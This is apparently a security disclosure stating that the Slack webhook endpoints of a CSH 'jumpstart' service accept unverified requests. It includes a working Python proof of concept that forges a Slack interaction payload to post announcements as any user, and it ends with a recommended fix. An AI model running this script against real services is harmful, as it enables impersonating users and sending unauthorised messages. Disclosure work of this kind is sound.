The endpoints /api/slack/message_actions and /api/slack/events are unauthenticated and unsecured, meaning any 3rd party can pretend to be sending requests from Slack. This allows a 3rd party to send announcements on behalf of any user in the CSH Slack, as well as to send DMs to any user of the CSH Slack, without authentication and anonymously.
The following script shows an example of how a 3rd party can send in an announcement as another user, bypassing verification.
#!/bin/python
import requests
import json

URL = "https://jumpstart.csh.rit.edu/api/slack/message_actions"


def send_post(user_id: str, text: str):
    # Body shaped like a Slack "block_actions" interaction; nothing here proves it came from Slack
    payload_data = {
        "type": "block_actions",
        "user": {
            "id": user_id
        },
        "actions": [
            {
                "action_id": "yes_j",
                "value": json.dumps({"text": text})
            }
        ]
    }
    # Slack delivers interactions as a form field named "payload"; mimic that encoding
    files = {
        "payload": (None, json.dumps(payload_data), "application/json")
    }
    response = requests.post(URL, files=files)
    print("Status:", response.status_code)
    print("Response:", response.text)


if __name__ == "__main__":
    # Example usage
    send_post("U0906FX826S", "test")
This can be fixed by implementing request verification, a feature built into the Slack API:
https://docs.slack.dev/authentication/verifying-requests-from-slack/
Or, by verifying that the request's host is a Slack server.